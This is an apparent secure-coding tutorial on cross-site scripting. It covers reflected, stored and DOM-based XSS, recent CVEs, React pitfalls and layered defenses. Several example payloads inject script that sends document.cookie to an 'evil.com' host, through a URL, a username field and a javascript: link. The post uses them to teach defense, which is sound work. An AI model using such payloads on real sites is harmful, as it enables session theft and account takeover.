XSS: When User Input Becomes Code
Security First — Part 17 of 30
The Dashboard That Wasn't Safe
Imagine you're a data engineer at a mid-sized company. You open a Grafana dashboard a colleague shared with you — your usual morning routine. Nothing looks out of place. No popup, no warning, no weird redirect. You scroll through the charts, close the tab, and get on with your day.
What you didn't see: a script ran silently in your browser the moment that page loaded. It harvested your Grafana session token and sent it to a server controlled by an attacker. By lunchtime, that attacker is logged in as you — with full access to your dashboards, your data sources, and everything connected to your observability stack.
This isn't a hypothetical. In April 2025, security researchers at SonarSource confirmed exactly this vulnerability in Grafana — tracked as CVE-2025-2703. An authenticated editor could embed malicious JavaScript inside an XY Charts panel configuration stored as JSON. When any user opened that dashboard, the script executed in their browser. Grafana fixed it in version 11.6.0, but unpatched instances in default configuration were sitting ducks.
This is Cross-Site Scripting — XSS — and it is far from dead.
What XSS Actually Is
SQL injection (which we covered in Part 16) tricks a database into executing attacker-supplied commands. XSS tricks a browser into executing attacker-supplied code.
The mechanism is deceptively simple: your web application takes input from a user, then later displays that input back on a page without properly neutralizing it. If that input contains HTML tags or JavaScript, the browser doesn't know it came from an attacker — it just runs it.
The results range from nuisance to catastrophic: session hijacking, credential theft, keylogging, silent redirects to phishing pages, and in some cases (as Microsoft's security team documented in November 2025) a path all the way to remote code execution when XSS is chained with other vulnerabilities.
There are three flavors you need to understand.
The Three Types of XSS
1. Reflected XSS
The payload travels in the URL and "reflects" off the server into the response. Nobody stores it — it lives only in a specially crafted link.
https://yourapp.com/search?q=<script>document.location='https://evil.com/steal?c='+document.cookie</script>
The attacker sends that URL to victims (in a phishing email, a Slack message, a tweet). When the victim clicks it, the server echoes the q parameter back into the HTML, the browser executes the script, and the cookie is gone.
Who it targets: Anyone who clicks the link. The attacker has to trick people into clicking — which is why it's considered slightly less severe than stored XSS.
2. Stored XSS
This is the Grafana scenario. The payload is saved to a database or persistent storage, then served to every user who views that content. No malicious link required — simply visiting the page triggers the attack.
In December 2025, CVE-2025-65858 was disclosed in Calibre-Web v0.6.25 — a popular self-hosted ebook management app. An admin could create a user account with a username like:
<script>fetch('https://evil.com/steal?c='+document.cookie)</script>
That username was stored in the database unsanitized. Every time another admin loaded the user list at /ajax/listusers, the script fired in their browser. Admins stealing from other admins — the attacker just needed a foothold.
Similarly, CVE-2025-1623 in the GDPR Cookie Compliance WordPress plugin — installed on over 300,000 WordPress sites — allowed malicious JavaScript injected into a "Tracking ID" field to persist in plugin settings and execute on every page load. A stored XSS in a GDPR compliance tool. The irony writes itself.
3. DOM-Based XSS
This one never touches the server. The attack happens entirely in the browser, using JavaScript that reads from a URL fragment, window.location, or other browser APIs and writes it to the DOM without sanitizing it.
// Vulnerable: reads URL hash and injects directly into the page
const name = location.hash.slice(1);
document.getElementById('greeting').innerHTML = 'Hello, ' + name;
Navigate to yourapp.com/#<img src=x onerror=alert(1)> and that onerror handler fires. The server never saw the payload — there's no server log entry to alert on, no WAF rule that catches it.
DOM-based XSS is increasingly common in single-page applications built with React, Vue, or Svelte, precisely because developers assume the framework handles everything.
It does not.
Why React Doesn't Save You
React's JSX gives you genuine, meaningful protection out of the box. When you write:
function CommentDisplay({ userComment }) {
return <div>{userComment}</div>;
}
React automatically escapes userComment. If someone submits <script>alert('xss')</script>, it renders as literal text on the page — <script>... — not executable code. For the vast majority of basic rendering, you're covered.
But React has escape hatches, and those are exactly where XSS re-enters.
The dangerouslySetInnerHTML Trap
The name tells you everything. React forces you to be explicit about bypassing its protection:
// React escaping bypassed entirely
function ArticleBody({ htmlContent }) {
return <div dangerouslySetInnerHTML={{ __html: htmlContent }} />;
}
This pattern shows up legitimately all the time — rendering Markdown converted to HTML, displaying content from a CMS, embedding formatted email previews. The AI coding assistant you're using will generate this code and it will look perfectly reasonable in context. But if htmlContent ever contains user-supplied data that wasn't sanitized server-side, you have stored XSS.
The fix is one library:
import DOMPurify from 'dompurify';
function ArticleBody({ htmlContent }) {
const clean = DOMPurify.sanitize(htmlContent);
return <div dangerouslySetInnerHTML={{ __html: clean }} />;
}
DOMPurify strips anything executable while preserving safe formatting HTML. Add it as a reflex whenever you use dangerouslySetInnerHTML.
The href Attribute Problem
JavaScript URLs are valid in href attributes, and React does not block them:
// If userUrl comes from user input, this is an XSS vector
function UserLink({ userUrl, label }) {
return <a href={userUrl}>{label}</a>;
}
An attacker sets their profile URL to javascript:fetch('https://evil.com/steal?c='+document.cookie). Every user who clicks that link runs the code.
The fix:
// Validate that the URL uses a safe protocol before rendering
function isSafeUrl(url) {
try {
const parsed = new URL(url);
return ['https:', 'http:'].includes(parsed.protocol);
} catch {
return false;
}
}
function UserLink({ userUrl, label }) {
const safe = isSafeUrl(userUrl) ? userUrl : '#';
return <a href={safe}>{label}</a>;
}
eval(), innerHTML, and document.write()
These are the classics. If your AI-generated code ever uses any of these on data that came from a user, a URL parameter, or an API response you don't fully control, treat it as a vulnerability until proven otherwise.
// All three of these are XSS waiting to happen if `data` is user-controlled
eval(data);
document.getElementById('target').innerHTML = data;
document.write(data);
The XSS Defense Stack
No single measure is sufficient. Real protection is layered:
1. Output encoding by default. Use your framework's normal rendering — JSX {} interpolation in React, {{ }} in Vue, {{ }} in Jinja2. Never bypass it unless you have to.
2. Sanitize when you must render HTML. Use DOMPurify on the client or bleach (Python) on the server. Strip everything that isn't explicitly allowed.
import bleach
ALLOWED_TAGS = ['p', 'b', 'i', 'em', 'strong', 'a', 'ul', 'ol', 'li']
ALLOWED_ATTRS = {'a': ['href', 'title']}
clean_content = bleach.clean(
user_html,
tags=ALLOWED_TAGS,
attributes=ALLOWED_ATTRS,
strip=True
)
3. Set a Content Security Policy (CSP) header. A CSP tells the browser which scripts are allowed to run. Inline scripts and scripts from unexpected domains get blocked — even if an XSS payload makes it through.
Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none';
4. Mark cookies HttpOnly and Secure. HttpOnly cookies can't be read by JavaScript at all — which means an XSS attack can't steal them via document.cookie.
# Flask example
response.set_cookie('session', value, httponly=True, secure=True, samesite='Lax')
5. Validate URLs before rendering them in href or src attributes. Enforce https: or http: protocol. Block javascript:, data:, and vbscript:.
What to Tell Your AI Coding Assistant
The patterns that create XSS vulnerabilities — dangerouslySetInnerHTML, innerHTML, eval(), dynamic href values — are all in the training data of every AI coding tool. They will be suggested. They will look right.
When generating any component that renders user-supplied content, add this to your prompt:
Sanitize all user-supplied content before rendering. Use DOMPurify for client-side HTML, bleach for server-side Python HTML, and validate all URL attributes to ensure they use only http: or https: protocols. Never use dangerouslySetInnerHTML with unsanitized input.
Make it a habit. The AI follows instructions; give it the right ones.
Quick-Reference Checklist
- Rendering user text? Use JSX
{}or your framework's default escaping — neverinnerHTMLoreval() - Using
dangerouslySetInnerHTML? Wrap the content inDOMPurify.sanitize()first, every time - Rendering user-supplied URLs in
hreforsrc? Validate the protocol — allow onlyhttp:andhttps: - Storing user content in a database? Sanitize on output, not just on input
- CSP header configured? Block inline scripts and unexpected external domains
- Session cookies marked
HttpOnly? If yes, XSS can't steal them viadocument.cookie - Using
eval()anywhere? Almost never necessary — audit and remove it - Any libraries using
innerHTMLinternally? Check your npm dependencies for known XSS CVEs regularly
Ask The Guild
This week's community prompt:
Pull up a project you've built or are currently working on. Search the codebase for these five strings: dangerouslySetInnerHTML, innerHTML, eval(, href={, document.write. For each one you find, drop into the Guild Discord and share: what it's doing, whether it touches user input, and how you'd fix it (or why you're confident it's already safe).
Bonus points if you find one you didn't know was there.
Next up — Part 18: Authentication Done Right. We'll cover password hashing, session management, and the JWT pitfalls that AI coding tools generate by default.
— Tom Hundley